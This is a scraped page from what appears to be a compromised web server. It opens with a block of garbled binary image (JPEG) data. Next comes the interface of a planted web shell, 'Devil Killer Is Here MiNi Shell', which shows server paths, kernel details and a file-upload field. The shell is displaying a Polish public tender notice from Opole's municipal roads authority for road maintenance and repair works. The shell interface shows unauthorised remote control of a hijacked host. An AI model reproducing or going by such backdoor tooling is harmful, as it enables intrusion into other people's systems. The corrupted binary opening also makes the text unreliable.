JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220224/0006725101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty i bieżące utrzymanie dróg, w zakresie robót polegających na utrzymaniu i remontach jezdni dróg krajowych i wojewódzkich na terenie miasta Opola </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZARZĄD DRÓG W OPOLU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">MZD w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 530546013</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Firmowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-594</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mzd.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.umopole.logintrade.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Umowy ramowej </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty i bieżące utrzymanie dróg, w zakresie robót polegających na utrzymaniu i remontach jezdni dróg krajowych i wojewódzkich na terenie miasta Opola </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8bb32342-955e-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00067251</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019907/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remonty i bieżące utrzymanie dróg, w zakresie robót polegających na utrzymaniu i remontach jezdni dróg krajowych i wojewódzkich na terenie miasta Opola</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.17.) Tryb zawarcia umowy ramowej wraz z podstawą prawną</h3> <p class="mb-0"> Umowa ramowa udzielana jest w trybie podstawowym na podstawie: art. 311 ust. 1 pkt 2 ustawy w zw. z art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://umopole.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://umopole.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy:<br/>a) Dopuszczalne przeglądarki internetowe:<br/>o Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>o Google Chrome 31<br/>o Mozilla Firefox 26<br/>o Opera 18<br/>b) Pozostałe wymagania techniczne:<br/>o dostęp do sieci Internet<br/>o obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/>o włączona obsługa JavaScript<br/>o zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>o zainstalowany Acrobat Reader<br/>o zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub<br/>nowszy<br/>c) Wspierane są rozwiązania dostarczane przez firmy:<br/>o Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.<br/>o Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.<br/>o Powszechne Centrum Certyfikacji Certum firmy Unizeto Technologies SA.<br/>o Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.<br/>d) Dopuszczalne formaty przesyłanych danych: image/bmp, image/x-windows-bmp,<br/>application/msword, application/drafting, image/gif, application/x-compressed, application/x-gzip,<br/>multipart/x-gzip, image/jpeg, image/pjpeg, application/x-latex, application/pdf, image/pict, image/png,<br/>application/mspowerpoint, application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff,<br/>image/x-tiff, application/mswrite, application/excel, application/x-excel, application/vnd.ms-excel,<br/>application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zip-compressed, application/zip,<br/>application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma,<br/>application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad,<br/>application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg, application/x-autocad,<br/>image/vnd.dwg, drawing/dwg.<br/>e) Kodowanie i oznaczenie czasu przekazania danych: Czas zapisywany jest w formacie YYYY-MM<br/>DD HH:MM:SS. Czas przekazania danych jest to czas, w którym zostanie potwierdzone złożenie<br/>oferty, dokumentu przez Wykonawcę. Potwierdzenie odbywa się poprzez kliknięcie w link dostępny w<br/>wiadomości mailowej, wysłanej automatycznie po złożeniu oferty, dokumentu będąc niezalogowanym<br/>na Platformie zakupowej. Wiadomość otrzymuje Wykonawca na adres e-mail wskazany w formularzu.<br/>W przypadku Wykonawcy zalogowanego na Platformie zakupowej, czas przekazania danych jest to<br/>czas wysłania dokumentu, oferty przez Platformę.<br/>Pozostałe szczegółowe informacje dotyczące komunikacji zawarte zostały w rozdziale 16 i 18 SWZ<br/>dostępnej na www.umopole.logintrade.net</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.13. Zamawiający przewiduje pobranie ze złożonych katalogów elektronicznych danych potrzebnych do sporządzenia ofert dostosowanych do wymagań danego zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE. L. z 2016 r. Nr 119, str. 1)<br/>– zwane dalej RODO, Miejski Zarząd Dróg w Opolu, ul. Firmowa 1, 45-594 Opole informuje, iż:<br/>1) Administratorem Pani/Pana danych osobowych jest Miejski Zarząd Dróg w Opolu, ul. Firmowa 1, 45-<br/>594 Opole.<br/>2) Administrator powołał Inspektora Ochrony Danych i może Pani/Pan skontaktować się z nim pisząc<br/>na adres iod@mzd.opole.pl lub dzwoniąc pod nr telefonu 696 159 845 (w godzinach 8:00-15:00 od<br/>poniedziałku do piątku);<br/>3) Pani/Pana dane osobowe będą przetwarzane na podstawie:<br/>o art. 6 ust. 1 lit. c) RODO tj w celu wykonania obowiązków prawnych ciążących na Administratorze<br/>wynikających z przepisów ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r<br/>poz. 2019), „ustawa Pzp” w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/>o art. 6 ust. 1 lit. b) RODO tj w celu wykonania umowy;<br/>o art. 6 ust. 1 lit. c) RODO tj w celu wykonania obowiązków prawnych ciążących na Administratorze<br/>wynikających z przepisów ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r<br/>poz. 2019, z późn. zm.), „ustawa Pzp” w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego w postępowaniu nr. ref. NP.260.08.2022.P prowadzonym w trybie podstawowym bez<br/>negocjacji.<br/>4) Kategoria danych osobowych<br/><br/>Administrator będzie przetwarzał Pani/Pana dane osobowe zwykłe niezbędne do zamówienia.<br/>5) Źródło pochodzenia danych<br/>Miejski Zarząd dróg w Opolu gromadzi dane osobowe pozyskane bezpośrednio od Pani/Pana jako<br/>osoby, od której pochodzą.<br/>6) Odbiorcy danych osobowych<br/>Odbiorcami Pani/Pana danych osobowych są osoby upoważnione przez Administratora do<br/>przetwarzania danych w ramach wykonywania swoich obowiązków służbowych i funkcji, podmioty<br/>którym Administrator zleca wykonywanie czynności, z którymi wiąże się konieczność przetwarzania<br/>danych („Podmioty Przetwarzające”).<br/>Odbiorcami Pani/Pana danych osobowych mogą być również podmioty uprawnione do odbioru<br/>Pani/Pana danych tylko w uzasadnionych przypadkach i na podstawie odpowiednich przepisów prawa.<br/>Odbiorców tych obowiązuje klauzula zachowania poufności pozyskanych w takich okolicznościach<br/>wszelkich danych, w tym danych osobowych.<br/>Dane te nie są przekazywane poza Europejski Obszar Gospodarczy.<br/>Pozostałe szczegółowe wymagania dotyczące RODO zawarte zostały w rozdziale 39 SWZ dostępnej<br/>na www.umopole.logintrade.net</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Pozostałe szczegółowe wymagania dotyczące RODO<br/>zawarte zostały w rozdziale 39 SWZ dostępnej na www.umopole.logintrade.net</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NP.260.08.2022.P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres prac obejmuje:<br/>I. Frezowanie nawierzchni bitumicznych<br/>II. Rozbiórka nawierzchni<br/>III. Zabezpieczenie nawierzchni drogowych<br/>IV. Zabezpieczenie nawierzchni drogowych w trybie awaryjnym<br/>V. Wykonanie remontu cząstkowego nawierzchni z betonu asfaltowego grysowego<br/>VI. Wykonanie koryta<br/>VII. Wykonanie podbudowy drogowej<br/>VIII. Wykonanie stabilizacji cementem<br/>IX. Wyrównanie istniejącej nawierzchni bitumicznej betonem asfaltowym<br/>X. Wykonanie warstwy wiążącej z betonu asfaltowego grysowego<br/>XI. Wykonanie warstwy ścieralnej z betonu asfaltowego grysowego<br/>XII. Wykonanie nawierzchni z masy SMA<br/>XIII. Geosiatka<br/>XIV. Wykonanie remontu cząstkowego i nowej nawierzchni z kostki kamiennej 10 cm<br/>XV. Wykonanie remontu cząstkowego i nowej nawierzchni z kostki kamiennej 18 cm<br/>XVI. Spoinowanie kostki kamiennej<br/>XVII. Rozebranie i ustawienie krawężników betonowych<br/>XVIII. Rozebranie i ustawienie krawężników kamiennych<br/>XIX. Rozbiórka podbudowy betonowej i płyt betonowych drogowych<br/>XX. Rozbiórka podbudowy tłuczniowej<br/>XXI. Regulacja wysokościowa studzienek ściekowych i studni rewizyjnych<br/>XXII. Kanalizacja deszczowa i odwodnienie<br/>XXIII. Konserwacja poboczy<br/>XXIV. Konserwacja skarp<br/>XXV. Czyszczenie i umocnienie rowów<br/>XXVI. Naprawa spękań nawierzchni bitumicznych masą zalewową<br/>XXVII. Recykling z zastosowaniem mieszanki mineralno-cementowo-emulsyjnej MCE<br/>Realizacja robót na polecenie Zamawiającego przy czym Zamawiający każdorazowo określa<br/>zakres robót, miejsce, terminy realizacji i ich przybliżoną wartość. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">27 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>u.p.z.p.<br/>2. Szacunkowa wartość zamówień wynosi 500 000,00 zł netto.<br/>3. Wielkość i zakres zamówienia dotyczy wykonania robót budowlanych w następującym zakresie:<br/>realizacji zadania pn.: Remonty i bieżące utrzymanie dróg, w zakresie robót polegających na<br/>utrzymaniu i remontach jezdni dróg krajowych i wojewódzkich na terenie miasta Opola.<br/>4. Warunki, na jakich zostanie udzielone zamówienie:<br/>1) Zamówienie będzie udzielone w przypadku uzyskania dodatkowych środków na realizację<br/>zamówienia polegającego na powtórzeniu podobnych robót po przeprowadzenia procedury<br/>przewidzianej w art. 214 ust. 1 pkt 7 u.p.z.p.<br/>2) W prowadzonym postępowaniu na podstawie art. 214 ust. 1 pkt 7 u.p.z.p. Zamawiający będzie<br/>wprowadzał podstawy wykluczenia z postępowania identyczne z tymi, które stosował w pierwotnym<br/>przetargu łącznie z takimi samymi dokumentami na potwierdzenie ich spełnienia określonymi w<br/>rozdziale 10 SWZ.<br/>3) Wymagania dotyczące zabezpieczenia należytego wykonania zamówienia będą na identycznym –<br/>proporcjonalnym poziomie jak wskazane w niniejszym postępowaniu.<br/>4) Obowiązywać będą te same zasady dotyczące podwykonawstwa, jak w niniejszym postępowaniu i<br/>umowie.<br/>5) Terminy płatności i zasady rozliczeń nie będą modyfikowane w stosunku i proporcji do pierwotnego<br/>zamówienia i umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert,<br/>które:<br/>1) zostaną złożone przez Wykonawców nie wykluczonych przez Zamawiającego z niniejszego<br/>postępowania;<br/>2) nie zostaną odrzucone przez Zamawiającego.<br/>2. Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w<br/>specyfikacji warunków zamówienia.<br/>3. Kryteriami oceny ofert są:<br/>1) cena – 60%<br/>2) czas reakcji – 20%<br/>3) okres gwarancji i rękojmi – 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dotyczący zdolności technicznej lub zawodowej będzie uznany za spełniony, jeżeli<br/>Wykonawca wykaże:<br/>a) dysponowanie osobą/osobami wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu<br/>wykonywania przez nich czynności:<br/>Kierownik budowy posiadający:<br/>- uprawnienia budowlane bez ograniczeń do pełnienia samodzielnej funkcji do kierowania<br/>robotami budowlanymi w specjalności inżynieryjnej drogowej potwierdzone stosownymi<br/>decyzjami, o których mowa w art. 12 ust. 2 (z uwzględnieniem art. 104) ustawy z dnia 7 lipca<br/>1994 r. Prawo budowlane (Dz.U. z 2021 r. poz. 2351, t.j. z późn.zm.)<br/>- wykazujący się doświadczeniem zawodowym na stanowisku kierownika budowy lub kierownika<br/>robót lub inspektora nadzoru branży drogowej<br/>*Wszystkie osoby będące obywatelami krajów członkowskich Unii Europejskiej, które<br/>Wykonawca wskaże do uczestniczenia w wykonaniu niniejszego zamówienia i od których<br/>wymagane są uprawnienia budowlane, winny posiadać decyzję w sprawie uznania wymaganych<br/>kwalifikacji do wykonywania w Rzeczypospolitej Polskiej funkcji technicznych w budownictwie w<br/>zakresie przedmiotu niniejszego zamówienia zgodnie z Ustawą z 22 grudnia 2015 r. o zasadach<br/>uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej (Dz. U. z<br/>2016 r. poz. 65) lub ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394, z<br/>2013 r. poz. 1650 oraz z 2014 r. poz. 1004), dopuszcza się także kwalifikacje równoważne do<br/>przedstawionych powyżej zdobyte w innych państwach na zasadach określonych w art. 12a<br/>ustawy Prawo budowlane w związku z przepisami ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej lub<br/>art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów<br/>budownictwa oraz urbanistów.<br/>W przypadku Wykonawców wspólnie ubiegających się o realizację zamówienia (art. 58 u.p.z.p.)<br/>wyżej opisany warunek udziału w postępowaniu Wykonawcy mogą wykazać łącznie razem lub<br/>co najmniej jeden z nich.<br/>b) wykonanie w okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 (jednej) roboty budowalnej,<br/>której przedmiot zamówienia obejmował budowę lub przebudowę lub remont drogi o nawierzchni<br/>bitumicznej (asfaltobeton lub SMA), o łącznej powierzchni nie mniejszej niż 1 500,00 m2.<br/>Uwaga:<br/>Pod pojęciami budowa, przebudowa lub remont rozumie się pojęcia zdefiniowane w art. 3 i odpowiednio w pkt 6), 7a) i 8) ustawy Prawo budowlane.<br/>W odniesieniu do osoby mającej pełnić funkcję kierownika budowy pojęcie „doświadczenie<br/>zawodowe” należy rozumieć, jako pełnienie funkcji kierownika budowy zgodnie z ustawą Prawo<br/>Budowlane, związanych z realizacją co najmniej 1 zadania określonego w wymaganiach<br/>Zamawiającego w pkt 2 ppkt 4 lit a niniejszego Rozdziału.<br/>W przypadku Wykonawców wspólnie ubiegających się o realizację zamówienia (art. 58 u.p.z.p.)<br/>wyżej opisany warunek udziału w postępowaniu Wykonawcy mogą wykazać łącznie razem lub<br/>co najmniej jeden z nich. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na 